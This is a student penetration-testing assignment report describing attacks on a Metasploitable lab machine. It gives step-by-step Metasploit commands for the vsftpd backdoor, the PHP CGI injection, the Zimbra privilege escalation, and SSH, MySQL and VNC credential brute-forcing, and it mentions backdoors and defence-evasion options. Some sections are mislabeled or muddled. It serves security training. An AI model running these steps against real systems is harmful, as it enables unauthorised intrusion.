ASSIGNMENT-3

EXPLOITING OF METASPLOIT MACHINE

ASSESSMENT REPORT

BY: - S VENKATESH REDDY

TARGET: - 10.0.3.6

1
Exploitation is probably one of the most glamorous parts of a
penetration test, yet it is often done with brute force rather than
with precision. An exploit should be performed only when you
know almost beyond a shadow of a doubt that a particular
exploit will be successful. Using kali linux machine exploiting
Metasploit 2.0 linux by using various exploits and auxiliaries as
a pentester.

This assignment is most helpful for a beginner pentester and

useful for RED TEAM who finds bugs in a machine and exploit
loopholes in a server or IoT’s.

2
 BRIEFCONTENTS

1. Introduction

2. NMAP Scan for Open ports

3. Vsftpd exploit on FTP port

4. OpenSSH exploit

5. Linux Telnetd exploit

6. Postfix SMPT (Zimbra) Exploit

7. ISC BIND (DNS) EXPLOIT

8. Web Server Exploit (Port 80)

9. Apache Tomcat Exploit

10.MySQL Exploit

11.VNC Exploit

12.Unreal IRCD exploit

Conclusion

3
 1. INTRODUCTION
Metasploit Pro is an exploitation and vulnerability validation tool that helps you divide the
penetration testing workflow into manageable sections. While you can set up your own
workflow, listed below is a typical workflow to help you get started.
Firstly, to perform the attack on Metaspoitable, we need to carry out the enumeration process
on the attacking machine. For this purpose we have a number of tools available in Kali
Linux, most commonly use of Nmap and nikto is done.We use Nmapin our case.

1. Identify the target: Select the target system or network you want to test.
2. Gather information: Conduct reconnaissance on the target to gather as
much information as possible, including network topology, operating
system, applications running on the system, and open ports.
3. Identify vulnerabilities: Use tools such as Nmap or Nessus to identify
vulnerabilities in the target system.
4. Exploit vulnerabilities: Once vulnerabilities are identified, use Metasploit to
exploit them. Metasploit provides a range of exploits and payloads that can
be used to gain access to the target system.
5. Gain access and escalate privileges: Once access is gained, escalate
privileges to gain greater control over the system.
6. Maintain access: Use backdoors and other techniques to maintain access to
the system for future use.

4
 2. NMAP Scan for Open ports
 Nmap will act as a first phase of attack in which to gather information about target
machine or server.
 The discovery scan includes a UDP scan, which sends UDP probes to the most
commonly known UDP ports, such as NETBIOS, DHCP, DNS, and SNMP. The scan
tests approximately 250 ports that are typically exposed for external services and are
more commonly tested during a penetration test.
 Below is the screenshot attached for Nmap scan done on target.

5
Exploitation will be performed for the below mentioned open ports using msfconsole -q command from
kali Linux.
3. Vsftpd exploit on FTP port
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This
backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011
according to the most recent information available.

Step 1:- Start the Metasploit Console

1.1 msfconsole

6
1.2 Use the VSFTPD v2.3.4 Backdoor Command Execution Exploit

 search vsftpd
 use exploit/unix/ftp/vsftpd_234_backdoor

1.3 Set RHOST (Victim IP Address)

1. show options

7
 2. set RHOST 10.0.3.6

1.4 Exploit

 Now you should see a Command Shell Session opened between BackTrack to Metasploitable.

From Above we can understand on the port 21 FTP we have a possibility to exploit
as the port is open on the target machine.

8
4 OpenSSH exploit
The Secure Shell Protocol (SSH) is a cryptographic network protocol for operating network services
securely over an unsecured network. Brute forcing ssh over port 22 and gaining access with valid
username and password and maintain access by changing configurations in /etc/ssh/sshd_config

 Select this auxiliary ssh file by giving the following command

Set the options as much as you have

9
 set RHOSTS 10.0.3.6 (vulnerable machine address)
 set PASS_FILE /home/kali/Desktop/passwords.txt (path of the passwords text file)
 set USER_FILE /root/Desktop/usernames.txt (path of the usernames text file)
 set VERBOSE true (it will show the exactly matched combination of username and password)

Exploit the SSH by using exploit command on msfconsole

5 Linux Telnetd
 Exploring for vulnerabilities on Linux Telnet over port 23.

10
Using linux/telnet/netgear_telnetenable to exploit for Telnet enabling which has
excellent rank.
6 Postfix SMPT (Zimbra) Exploit
Exploits a vulnerable sudo configuration that permits the zimbra user to execute postfix as
root. In turn, postfix can execute arbitrary shellscripts, which means it can execute a root
shell.

11
Here is how the linux/local/zimbra_postfix_priv_esc exploit module looks in the msfconsole

12
This is a complete list of options available in the linux/local/zimbra_postfix_priv_esc exploit

13
Here is a complete list of advanced options supported by the linux/local/zimbra_postfix_priv_esc exploit

This is a list of possible payloads which can be delivered and executed on the target system using the
linux/local/zimbra_postfix_priv_esc exploit

14
Here is the full list of possible evasion options supported by the linux/local/zimbra_postfix_priv_esc
exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc )

7 ISC BIND (DNS) EXPLOIT

This exploit targets a fairly ubiquitous flaw in DNS implementations which allow the insertion of
malicious DNS records into the cache of the target nameserver. This exploit caches a single malicious
nameserver entry into the target nameserver which replaces the legitimate nameservers for the target
domain. By causing the target nameserver to query for random hostnames at the target domain, the
attacker can spoof a response to the target server including an answer for the query, an authority server
record, and an additional record for that server, causing target nameserver to insert the additional record
into the cache. This insertion completely replaces the original nameserver records for the target domain.

15
 Exploiting the options on how to perform Remote Code execution.

 For further details on exploitation using advanced command on port 53.

16
 Payload advanced options

 DNS exploitation has been done but due to good firewall configuration may
be remote host was not accepting the request session has been created.

17
8 Web Server Exploit (Port 80)
Port 80 is the default port for http services (web pages). In a previous scan we’ve determine that port 80 is
open. It’s now time to determine what is running behind that port.

It’s Apache running in Ubuntu. Let’s try to gather some more info with an auxiliary scanner

 use auxiliary/scanner/http/http_version
 set rhosts 10.0.3.6
 show options
 run

It’s Apache 2.2.8 with PHP 5.2.4. We can navigate to ‘http://10.0.3.6/phpinfo.php’ and confirm the
information already gathered:

18
Lets try other http modules to obtain more information about our server:
‘dir_scanner’ will determine if directory listing is enabled

 use auxiliary/scanner/http/dir_scanner
 set rhosts 10.0.3.6
 run

19
We got 6 directories. Going through their content might give us an edge to hack our target. Lets try
another module, ‘files_dir’

 use auxiliary/scanner/http/files_dir
 show options
 run

20
Once again, these results might make a difference and we should take a look at them. Other module of
interest id ‘options’, ‘robots_txt’ and ‘verb_auth_bypass’

 use auxiliary/scanner/http/verb_auth_bypass
 show options
 run

CGI Remote Code Execution found. Let’s exploit it

 use exploit/multi/http/php_cgi_arg_injection
 show options
 run

We got meterpreter shell!!

21
Port 80 is a good source of information and exploit as any other port. We’ll come back to this port for the
web apps installed. In this article we got information about the services running and found an exploit that
gave us a shell.

10 MySQL Exploit

This is a MySQL post-exploit tool used after you discover the database password using tool like
Metasploit's MySQL Login Utility.

22
10. 1 etting access for MySQL DB password.txt file needs to be created for gaining accesss. Search for
Metasploit Module

 search mysql
 Highlight and Right Click on auxiliary/scanner/mysql/mysql_login
 Select Copy

23
10.2 Set Metasploit Module

 use auxiliary/scanner/mysql/mysql_login
 show options
 In the follow steps we will set PASS_FILE and RHOSTS

10.3 Set the PASS_FILE and RHOSTS

24
  set PASS_FILE /root/Desktop/password.txt
 set RHOSTS 10.0.3.6
 set USER_FILE /root/Desktop/username.txt
 show options

10.4 Brute Force MySQL Password

 Run exploit
 Notice the root password (root) was successfully guessed.

25
11 VNC Exploit
The vnc_login auxiliary module will scan an IP address or range of addresses and attempt to login via
VNC with either a provided password or a wordlist. VNC (Virtual Network Computing) is a graphical
desktop sharing system that allows you to remotely control a computer over a network connection.

26
 Trying to exploit the remote computer using capture technique and exploiting
with different options.

We set our target range, threads, and perhaps most importantly, the BRUTEFORCE_SPEED value. Many
newer VNC servers will automatically ban further login attempts if too many failed ones are made
consecutively.

27
With our module configuration set, we run the module. Notice in the output below that Metasploit
automatically adjusts the retry interval after being notified of too many failed login attempts.

By using vncviewer command along with target ip address to get access

Below is the target desktop connected after exploit

28
Exploiting vnc_none_auth
The vnc_none_auth scanner, as its name implies, scans a range of hosts for VNC servers
that do not have any authentication set on them.

To run our scan, we simply set the RHOSTS and THREADS values and let it run.

In our scan results, we see that one of our targets has wide open GUI access.

29